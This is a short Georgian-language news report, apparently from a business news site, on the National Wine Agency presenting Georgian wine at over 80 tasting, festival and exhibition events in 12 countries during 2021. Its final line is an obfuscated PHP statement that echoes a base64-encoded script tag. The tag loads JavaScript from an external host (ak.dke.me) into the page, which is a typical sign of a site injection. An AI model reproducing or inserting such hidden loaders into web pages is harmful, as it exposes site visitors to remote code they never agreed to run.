celsiusi
ავერსი საქკაბელი
ღვინის ეროვნული სააგენტოს მხარდაჭერით, 2021 წელს, ქართული ღვინო მსოფლიოს 12 ქვეყანაში, 80-ზე მეტ ღონისძიებაზე იყო წარდგენილი.
 
როგორც საინფორმაციო სააგენტო WWW.BUSINESSTIME.GE-ის ღვინის ეროვნული სააგენტოდან აცნობეს, მსოფლიო პანდემიით შექმნილი ვითარების მიუხედავად, ღვინის ეროვნული სააგენტო, 2021 წელს, საერთაშორისო ბაზრების დივერსიფიცირების, ქართული ღვინის საექსპორტო პოტენციალისა და ცნობადობის გაზრდის მიზნით, აქტიურ მარკეტინგული კამპანიას ახორციელებდა.  
 
გასულ წელს, ქართული ღვინო, წარმოდგენილი იყო 77 დეგუსტაციაზე, 3 ფესტივალზე, 2 გამოფენასა და 2 „ქართული ღვინის ფორუმზე“ შემდეგ ქვეყნებში: აშშ, დიდი ბრიტანეთი, საფრანგეთი, მონაკო, შვეიცარია, გერმანია, პოლონეთი,  ლიეტუვა, ლატვია, ჩინეთი, სამხრეთ კორეა და იაპონია. 
 
ღვინის ეროვნულმა სააგენტომ, აღნიშნულ ქვეყნებში გამართულ ღონისძიებებზე წარსადგენად, 5600 ბოთლამდე სადეგუსტაციო ღვინის გაგზავნა უზრუნველყო.
960
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");